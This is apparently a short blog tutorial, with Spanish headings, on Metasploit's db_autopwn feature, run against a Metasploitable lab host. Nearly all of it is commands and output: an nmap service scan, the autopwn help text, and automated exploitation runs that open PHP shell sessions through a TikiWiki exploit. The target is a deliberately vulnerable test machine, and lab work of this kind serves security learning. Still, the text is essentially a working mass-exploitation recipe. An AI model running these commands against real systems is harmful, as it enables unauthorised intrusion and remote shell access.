# Autopwn

Introducción

Autopwn

Ejecución
# svn update /opt/metasploit3/msf3/
# msfconsole
msf > db_nmap -PN -sS -sV 192.168.1.50

Interesting ports on 192.168.1.50:
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds
msf > db_autopwn -t -p -e
Active sessions
===============

  Id  Type       Connection                                Via
  --  ----       ----------                                ---
  1   shell php  192.168.1.100:40803 -> 192.168.1.50:5452  exploit/unix/webapp/tikiwiki_graph_formula_exec


msf > session -i 1
msf > db_autopwn -t -x -e
Active sessions
===============

  Id  Type       Connection                                 Via
  --  ----       ----------                                 ---
  2   shell php  192.168.1.100:39008 -> 192.168.1.50:12186  exploit/unix/webapp/tikiwiki_graph_formula_exec

msf > session -i 2

No comments: